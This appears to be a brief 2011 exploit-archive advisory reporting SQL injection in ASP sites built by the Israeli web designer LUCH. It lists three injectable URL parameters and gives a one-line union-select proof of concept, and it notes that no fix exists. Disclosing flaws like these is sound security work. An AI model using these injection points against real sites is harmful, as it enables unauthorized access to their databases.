Luch Web Designer Multiple SQL Injection Vulnerabilities

2011-03-10 13:15:14

Title : Web Designed by LUCH Vulnerable to SQL Injection
Vendor : http://www.luch.co.il
Found by: p0pc0rn

SQL
---

http://site.com/page.asp?id=[SQL]
http://site.com/cat.asp?catid=[SQL]
http://site.com/catin.asp?productid=[SQL]

POC
---
http://site.com/page.asp?id=23 union select 1 from test.a

Fixes

No fixes

In order to submit a new fix you need to be registered.